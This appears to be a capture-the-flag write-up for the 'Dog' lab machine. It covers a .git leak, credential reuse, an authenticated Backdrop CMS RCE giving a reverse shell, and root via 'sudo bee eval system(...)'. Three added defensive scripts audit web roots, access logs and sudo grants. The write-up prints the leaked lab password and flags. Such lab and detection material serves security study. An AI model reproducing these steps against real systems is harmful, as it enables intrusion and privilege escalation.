Dog
Enumeration
nmap
The first scan found that the host exposes ports 22 and 80; the port details are as follows
┌──(kali㉿kali)-[~/Desktop/vegetable/HTB]
└─$ nmap -sC -sV -p 22,80 -oA nmap 10.10.11.58
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-26 03:36 EDT
Nmap scan report for 10.10.11.58
Host is up (2.3s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 97:2a:d2:2c:89:8a:d3:ed:4d:ac:00:d2:1e:87:49:a7 (RSA)
| 256 27:7c:3c:eb:0f:26:e9:62:59:0f:0f:b1:38:c9:ae:2b (ECDSA)
|_ 256 93:88:47:4c:69:af:72:16:09:4c:ba:77:1e:3b:3b:eb (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 22 disallowed entries (15 shown)
| /core/ /profiles/ /README.md /web.config /admin
| /comment/reply /filter/tips /node/add /search /user/register
|_/user/password /user/login /user/logout /?q=admin /?q=comment/reply
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 160.93 seconds
TCP/80
Browsing the site, the CMS name appears at the bottom of the page: Backdrop
Visited some of the paths found by the nmap scan
Picked a few interesting-looking ones, but found nothing useful
Foothold
.git directory leak
Back to the CMS: an online search turned up an RCE vulnerability, but it requires authentication
Scanned for other possible paths with a directory scanner and found .git
Restored and downloaded it with the GitHack.py tool
┌──(kali㉿kali)-[~/Desktop/vegetable/GitHack]
└─$ python GitHack.py http://10.10.11.58/.git
[+] Download and parse index file ...
[+] LICENSE.txt
[+] README.md
[+] core/.jshintignore
[+] core/.jshintrc
[+] core/authorize.php
[+] core/cron.php
[+] core/includes/actions.inc
[+] core/includes/ajax.inc
[+] core/includes/anonymous.inc
[+] core/includes/archiver.inc
When it finishes, a folder named after the IP address appears
┌──(kali㉿kali)-[~/Desktop/vegetable/GitHack]
└─$ ls
10.10.11.58 GitHack.py index lib README.md
While searching the folder for sensitive information, found the MySQL username and password; consider password reuse
grep -ri "root" 10.10.11.58
But the password did not work for SSH or the web login. Thought about brute forcing, but the responses were too slow. Other writeups pointed out that the e-mail name can be used, which is indeed a good idea: the part of an e-mail address before the @ is very likely a username elsewhere
┌──(kali㉿kali)-[~/Desktop/vegetable/GitHack]
└─$ grep -i "@dog.htb" 10.10.11.58 -r
10.10.11.58/files/config_83dddd18e1ec67fd8ff5bba2453c7fb3/active/update.settings.json: "tiffany@dog.htb"
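The two things found in the recovered repository, a database connection string with its password and an e-mail address that doubled as a username, are exactly what a defender should be looking for before a site goes live. The script below is an added example, not code from the writeup or from Backdrop CMS: it walks a local copy of a web root, reports version-control directories that would be served to clients, and reports secret-like config keys, user:password DSNs and e-mail addresses by file and key name without ever printing the secret value. The `build_sample_root()` tree, its file names and values are constructed sample data.

```python
"""Audit a web root for exposed VCS metadata and embedded credentials.

Added example, not code from the original writeup or from Backdrop CMS.
Reported findings name the file and the key or account involved, never
the secret value itself. Everything created by build_sample_root() is
constructed sample data.
"""
import os
import re
import tempfile
from dataclasses import dataclass

# Directories that must never be reachable below a web root.
VCS_DIRS = {'.git', '.svn', '.hg'}
# Config keys whose values are usually secrets.
SECRET_KEY_RE = re.compile(r'(password|passwd|pwd|secret|api[_-]?key|token)', re.I)
# key = 'value', key => "value", "key": "value"  (PHP, JSON and ini styles)
ASSIGN_RE = re.compile(r"""['"]?([A-Za-z_][A-Za-z0-9_]*)['"]?\s*(?:=>|=|:)\s*['"]([^'"]+)['"]""")
# scheme://user:password@host  (database DSNs such as mysql://...)
DSN_RE = re.compile(r'\b([a-z][a-z0-9+.-]*)://([^:/\s\'"]+):([^@\s\'"]+)@')
EMAIL_RE = re.compile(r'[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}')


@dataclass(frozen=True)
class Finding:
    kind: str    # 'vcs_dir', 'secret_key', 'dsn_credential' or 'email'
    path: str    # path relative to the scanned root
    detail: str  # directory name, key name, account or address; never the secret


def scan_text(rel_path, text):
    """Findings for one file's contents."""
    out = []
    for m in ASSIGN_RE.finditer(text):
        key, value = m.group(1), m.group(2)
        if SECRET_KEY_RE.search(key) and value.strip():
            out.append(Finding('secret_key', rel_path, key))
    for scheme, user, _password in DSN_RE.findall(text):
        out.append(Finding('dsn_credential', rel_path, f'{scheme} user {user}'))
    for address in sorted(set(EMAIL_RE.findall(text))):
        out.append(Finding('email', rel_path, address))
    return out


def scan_web_root(root):
    """Walk a web root and return all findings."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        rel_dir = os.path.relpath(dirpath, root)
        for name in list(dirnames):
            if name in VCS_DIRS:
                findings.append(Finding('vcs_dir', os.path.normpath(os.path.join(rel_dir, name)), name))
                dirnames.remove(name)  # the metadata itself need not be scanned
        for name in filenames:
            try:
                with open(os.path.join(dirpath, name), encoding='utf-8', errors='replace') as fh:
                    text = fh.read()
            except OSError:
                continue
            findings.extend(scan_text(os.path.normpath(os.path.join(rel_dir, name)), text))
    return findings


def build_sample_root():
    """Constructed web root reproducing the two kinds of leak from the writeup."""
    root = tempfile.mkdtemp(prefix='webroot_')
    os.makedirs(os.path.join(root, '.git'))
    with open(os.path.join(root, '.git', 'HEAD'), 'w') as fh:
        fh.write('ref: refs/heads/main\n')
    with open(os.path.join(root, 'settings.php'), 'w') as fh:
        fh.write("<?php\n$database = 'mysql://dbuser:EXAMPLE_DB_PASSWORD@127.0.0.1/backdrop';\n")
    cfg = os.path.join(root, 'files', 'config_active')
    os.makedirs(cfg)
    with open(os.path.join(cfg, 'update.settings.json'), 'w') as fh:
        fh.write('{\n  "update_emails": ["admin@example.com"]\n}\n')
    with open(os.path.join(root, 'mail.ini'), 'w') as fh:
        fh.write('smtp_password = "EXAMPLE_SMTP_PASSWORD"\n')
    return root


if __name__ == '__main__':
    for f in scan_web_root(build_sample_root()):
        print(f'{f.kind:15} {f.path:45} {f.detail}')
```

Run it against a real deployment directory with `scan_web_root('/var/www/html')`; any `vcs_dir` finding means the deploy process copied repository metadata into a served path, and any `dsn_credential` finding in a file under the web root is a password that one exposed directory listing or backup away from being public.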
BackDrop RCE
That gives a username. Tried logging in as tiffany:BackDropJ2024DS2024 and it worked. Exploit Database listed a vulnerability earlier, so try exploiting it directly
┌──(kali㉿kali)-[~/Desktop/vegetable/HTB/Dog]
└─$ searchsploit backdrop
------------------------------------------- ---------------------------------
 Exploit Title | Path
------------------------------------------- ---------------------------------
Backdrop CMS 1.20.0 - 'Multiple' Cross-Sit | php/webapps/50323.html
Backdrop CMS 1.23.0 - Stored XSS | php/webapps/51905.txt
Backdrop CMS 1.27.1 - Authenticated Remote | php/webapps/52021.py
Backdrop Cms v1.25.1 - Stored Cross-Site S | php/webapps/51597.txt
------------------------------------------- ---------------------------------
Shellcodes: No Results

┌──(kali㉿kali)-[~/Desktop/vegetable/HTB/Dog]
└─$ searchsploit -m php/webapps/52021.py
  Exploit: Backdrop CMS 1.27.1 - Authenticated Remote Command Execution (RCE)
      URL: https://www.exploit-db.com/exploits/52021
     Path: /usr/share/exploitdb/exploits/php/webapps/52021.py
    Codes: N/A
 Verified: True
File Type: Python script, Unicode text, UTF-8 text executable
Copied to: /home/kali/Desktop/vegetable/HTB/Dog/52021.py
Ran the Python file directly. First check how it is used, set the parameters as the usage message says, and it finishes. The last two lines of output say: Go to http://10.10.11.58/admin/modules/install and upload the shell.zip for Manual Installation. So the generated file should be uploaded at that path, and if the upload succeeds the next line, Your shell address: http://10.10.11.58/modules/shell/shell.php, gives the path where the uploaded shell should be reachable. Looks fairly simple
┌──(kali㉿kali)-[~/Desktop/vegetable/HTB/Dog]
└─$ python 52021.py http://10.10.11.58
Backdrop CMS 1.27.1 - Remote Command Execution Exploit
Evil module generating...
Evil module generated! shell.zip
Go to http://10.10.11.58/admin/modules/install and upload the shell.zip for Manual Installation.
Your shell address: http://10.10.11.58/modules/shell/shell.php
But there was a problem at the very first step: because of how the directory structure is laid out, the upload button turned out to be found only at the path below
Tried uploading shell.zip
But got a friendly warning that only certain file formats can be uploaded; that is easy enough to handle
Looking at the script that generates the payload, tried modifying it: change every zip in the Python code to tar and leave the rest unchanged, then regenerate the file the same way as before. The fifth line of output now says shell.tar was created
┌──(kali㉿kali)-[~/Desktop/vegetable/HTB/Dog]
└─$ python exp.py http://10.10.11.58
Backdrop CMS 1.27.1 - Remote Command Execution Exploit
Evil module generating...
Evil module generated! shell.tar
Go to http://10.10.11.58/admin/modules/install and upload the shell.tar for Manual Installation.
Your shell address: http://10.10.11.58/modules/shell/shell.php
Uploaded the .tar file the same way; it reports success
Visited the path given in the script's message, and it worked
But this shell gets cleaned up very quickly, so first prepare a suitable reverse shell, build the request with it, re-upload the .tar file and quickly visit the assembled URL; the listener then receives a shell
┌──(kali㉿kali)-[~]
└─$ nc -nvlp 1234
listening on [any] 1234 ...
connect to [10.10.16.59] from (UNKNOWN) [10.10.11.58] 57888
bash: cannot set terminal process group (876): Inappropriate ioctl for device
bash: no job control in this shell
www-data@dog:/var/www/html/modules/shell$ whoami
whoami
www-data
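Every step of the web-side chain above leaves a trace in the Apache access log: the repository download is a burst of requests under /.git/, and the module installer is a POST to /admin/modules/install followed within seconds by a GET for a .php file under /modules/. The detector below is an added example, not code from the writeup: it parses Apache combined-format lines, alerts on any request for version-control metadata, and correlates installer POSTs with later direct PHP requests per client IP inside a time window. The log lines in `SAMPLE_LOG` are constructed sample data modelled on this box.

```python
"""Detect the web-side traces of this attack chain in Apache access logs.

Added example, not from the original writeup. Log lines in SAMPLE_LOG are
constructed; the two rules are (1) any request for VCS metadata and
(2) a module-installer POST followed by a direct request for a PHP file
under /modules/ from the same client within a window.
"""
import re
from dataclasses import dataclass
from datetime import datetime

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+')
# A PHP file requested directly from a module directory: modules are meant
# to be loaded by the CMS, not executed by URL.
MODULE_PHP_RE = re.compile(r'^/modules/[^/]+/[^?]*\.php(\?.*)?$')
INSTALLER_PATH = '/admin/modules/install'

# Constructed sample data: one client that follows the writeup's chain and one
# that only logs in and browses a legitimate module's metadata.
SAMPLE_LOG = """\
10.10.16.59 - - [26/Jun/2025:03:40:01 -0400] "GET /.git/HEAD HTTP/1.1" 200 23 "-" "python-requests/2.31"
10.10.16.59 - - [26/Jun/2025:03:40:02 -0400] "GET /.git/index HTTP/1.1" 200 41231 "-" "python-requests/2.31"
10.10.14.2 - - [26/Jun/2025:03:50:00 -0400] "GET /user/login HTTP/1.1" 200 8812 "-" "Mozilla/5.0"
10.10.16.59 - - [26/Jun/2025:03:55:10 -0400] "POST /admin/modules/install HTTP/1.1" 302 - "-" "Mozilla/5.0"
10.10.16.59 - - [26/Jun/2025:03:55:14 -0400] "GET /modules/shell/shell.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.10.14.2 - - [26/Jun/2025:04:02:30 -0400] "POST /admin/modules/install HTTP/1.1" 302 - "-" "Mozilla/5.0"
10.10.14.2 - - [26/Jun/2025:04:03:00 -0400] "GET /modules/views/views.info HTTP/1.1" 403 199 "-" "Mozilla/5.0"
"""


@dataclass(frozen=True)
class Request:
    ip: str
    ts: datetime
    method: str
    path: str
    status: int


@dataclass(frozen=True)
class Alert:
    rule: str
    ip: str
    path: str


def parse_access_log(text):
    """Parse combined-format lines; lines that do not parse are skipped."""
    requests = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m['ts'], '%d/%b/%Y:%H:%M:%S %z')
        requests.append(Request(m['ip'], ts, m['method'], m['path'], int(m['status'])))
    return requests


def detect(text, window_seconds=600):
    """Return one Alert per request that matches a rule."""
    alerts = []
    last_installer_post = {}  # client ip -> time of its latest installer POST
    for req in parse_access_log(text):  # assumes chronological order, as Apache writes it
        if req.path == '/.git' or req.path.startswith('/.git/'):
            alerts.append(Alert('vcs_metadata_request', req.ip, req.path))
        if req.method == 'POST' and req.path.split('?')[0] == INSTALLER_PATH:
            last_installer_post[req.ip] = req.ts
        if req.status == 200 and MODULE_PHP_RE.match(req.path):
            t0 = last_installer_post.get(req.ip)
            if t0 is not None and 0 <= (req.ts - t0).total_seconds() <= window_seconds:
                alerts.append(Alert('module_upload_then_php_exec', req.ip, req.path))
    return alerts


if __name__ == '__main__':
    for a in detect(SAMPLE_LOG):
        print(f'{a.rule:30} {a.ip:15} {a.path}')
```

The second rule fires only when the PHP request succeeds (status 200), so a server that already refuses to execute PHP from module and upload directories produces no alert and no shell; denying `.git` at the Apache level (a `<DirectoryMatch>` block with `Require all denied`) likewise turns the first rule into a record of blocked attempts rather than a breach.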
Privilege Escalation
The current user is www-data; two users were found in the home directory
www-data@dog:/var/www/html/modules/shell$ ls /home
jobert johncusack
Considered password reuse again; after some tries, the earlier password logs in as johncusack. Since we have the password, checked sudo -l and found bee
johncusack@dog:/tmp$ sudo -l
[sudo] password for johncusack:
Matching Defaults entries for johncusack on dog:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User johncusack may run the following commands on dog:
    (ALL : ALL) /usr/local/bin/bee
Looked at how bee is used (translating its help output)
With the following, commands can be executed as root
johncusack@dog:~$ cd /var/www/html
johncusack@dog:/var/www/html$
johncusack@dog:/var/www/html$ sudo /usr/local/bin/bee eval "system('id');"
uid=0(root) gid=0(root) groups=0(root)
johncusack@dog:/var/www/html$ sudo /usr/local/bin/bee eval 'system("/bin/bash");'
root@dog:/var/www/html#
root@dog:/var/www/html# cat /home/johncusack/user.txt
7176e61dabe388fccd5a063ee57c616a
root@dog:/var/www/html# cat /root/root.txt
bd2e0207a6794f14909ddd58a1b836ea
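The sudo entry above is the whole privilege escalation: bee is granted as any user with no argument restriction, and its eval command runs arbitrary PHP, so the grant is equivalent to root. Auditing for that pattern is routine, and the parser below is an added example, not code from the writeup or from sudo: it reads the text `sudo -l` prints, returns one grant per command, and flags grants whose executable is a shell, an interpreter or a CMS command-line tool with an eval command when no arguments are pinned. The tool list is an assumption to be extended per environment, and the extra NOPASSWD entry in the sample output is constructed.

```python
"""Parse `sudo -l` output and flag grants that amount to root code execution.

Added example, not from the original writeup. CODE_EXEC_TOOLS is an
assumed starting list; the sample output mirrors the writeup plus one
constructed entry.
"""
import os
import re
from dataclasses import dataclass

# Tools that turn a sudo grant into arbitrary code execution when the grant
# does not pin their arguments. bee (Backdrop CLI) and drush/wp have eval
# commands; the rest are shells and interpreters. Extend as needed.
CODE_EXEC_TOOLS = {'bee', 'drush', 'wp', 'php', 'python', 'python3', 'perl',
                   'ruby', 'node', 'bash', 'sh', 'zsh', 'dash'}

USER_LINE = re.compile(r'^User (\S+) may run the following commands on (\S+):')
GRANT_LINE = re.compile(r'^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$')

SAMPLE_SUDO_L = r"""
Matching Defaults entries for johncusack on dog:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User johncusack may run the following commands on dog:
    (ALL : ALL) /usr/local/bin/bee
    (root) NOPASSWD: /usr/bin/systemctl restart apache2
"""


@dataclass(frozen=True)
class Grant:
    user: str
    host: str
    runas: str    # contents of the (...) part, e.g. 'ALL : ALL' or 'root'
    tags: tuple   # e.g. ('NOPASSWD',)
    command: str  # one command, arguments included if the grant pins them


def parse_sudo_l(text):
    """Return the command grants from `sudo -l` output, one Grant per command."""
    grants = []
    user = host = None
    in_commands = False
    for line in text.splitlines():
        m = USER_LINE.match(line)
        if m:
            user, host = m.group(1), m.group(2)
            in_commands = True
            continue
        if not in_commands or not line.strip():
            continue
        g = GRANT_LINE.match(line)
        if not g:
            continue
        tags = tuple(t.strip() for t in g['tags'].split(':') if t.strip())
        for cmd in g['cmds'].split(','):
            cmd = cmd.strip()
            if cmd:
                grants.append(Grant(user, host, g['runas'].strip(), tags, cmd))
    return grants


def risky_grants(grants):
    """Return (grant, reason) pairs for grants that hand over full code execution."""
    out = []
    for g in grants:
        tokens = g.command.split()
        exe = os.path.basename(tokens[0])
        if g.command == 'ALL':
            out.append((g, 'ALL: any command may be run'))
        elif exe in CODE_EXEC_TOOLS and len(tokens) == 1:
            out.append((g, f'{exe} executes arbitrary code and its arguments are not restricted'))
    return out


if __name__ == '__main__':
    for grant, reason in risky_grants(parse_sudo_l(SAMPLE_SUDO_L)):
        print(f'{grant.user}: ({grant.runas}) {grant.command}: {reason}')
```

For a fleet, feed it the output of `sudo -l` collected per user, or run the same grant regex over `/etc/sudoers` and `/etc/sudoers.d/*`; the fix for a hit like the bee entry is to restrict the grant to the specific subcommands operations actually need rather than the bare binary.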